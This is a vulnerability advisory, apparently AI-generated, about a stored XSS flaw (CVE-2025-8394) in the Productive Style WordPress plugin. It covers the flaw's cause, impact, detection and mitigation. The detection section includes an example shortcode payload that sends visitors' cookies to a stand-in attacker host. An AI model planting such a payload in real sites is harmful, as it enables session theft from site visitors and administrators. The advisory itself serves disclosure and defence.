
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-8394 is a Stored Cross-Site Scripting (XSS) vulnerability in the Productive Style plugin for WordPress, affecting all versions up to and including 1.1.23. The flaw exists in the display_productive_breadcrumb shortcode due to insufficient input sanitization and output escaping on user-supplied attributes. It was published on September 17, 2025, and assigned a CVSS v3.1 base score of 6.4 (Medium) (Wordfence, Red Hat CVE).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). The vulnerability arises because the display_productive_breadcrumb shortcode does not properly sanitize or escape user-supplied shortcode attributes before rendering them in HTML output. An authenticated attacker with at least contributor-level access can embed malicious JavaScript within a shortcode attribute, which is then stored in the database and executed in the browser of any user who visits the affected page (Wordfence, ENISA EUVD).
Successful exploitation allows an authenticated attacker to inject persistent malicious scripts into WordPress pages, which execute in the context of any visitor's browser. This can lead to session cookie theft, credential harvesting, defacement, redirection to malicious sites, or further attacks against site administrators. The CVSS scope is marked as "Changed," indicating the impact extends beyond the vulnerable component to affect other users' browsers (Wordfence).
No public proof-of-concept exploit code or in-the-wild exploitation has been reported for CVE-2025-8394. The EPSS score is approximately 0.03%, indicating a very low probability of exploitation in the near term. The vulnerability requires authenticated access at contributor level or above, which limits the attack surface. It is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (Wordfence, ENISA EUVD).
display_productive_breadcrumb shortcode with a crafted attribute containing a JavaScript payload, e.g., [display_productive_breadcrumb attribute="\"><script>document.location='https://attacker.com/steal?c='+document.cookie</script>"].wp-admin/post.php or REST API endpoints containing shortcode content with suspicious HTML/script tags or encoded payloads within display_productive_breadcrumb shortcode attributes.<script> tags or JavaScript event handlers stored in the wp_posts table within shortcode content associated with the Productive Style plugin.display_productive_breadcrumb shortcode, potentially indicating cookie exfiltration.breadcrumb.php in the plugin directory (/wp-content/plugins/productive-style/includes/common/module/breadcrumb.php) for any unauthorized modifications (Wordfence).WordPress site administrators should update the Productive Style plugin to a version beyond 1.1.23 if a patched release is available, or deactivate and remove the plugin until a fix is confirmed. The vulnerability was disclosed by Wordfence on September 17, 2025; check the WordPress plugin repository for the latest patched version. As a workaround, restrict contributor-level user registrations and limit who can publish content containing shortcodes. Implementing a Web Application Firewall (WAF) with XSS rules can provide additional protection (Wordfence, WordPress Plugin Repo).
Wordfence included CVE-2025-8394 in its weekly WordPress vulnerability report for September 15–21, 2025, as part of routine disclosure coverage (Wordfence Blog). No significant independent researcher commentary, vendor statements beyond the initial advisory, or notable social media discussion has been identified for this vulnerability.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."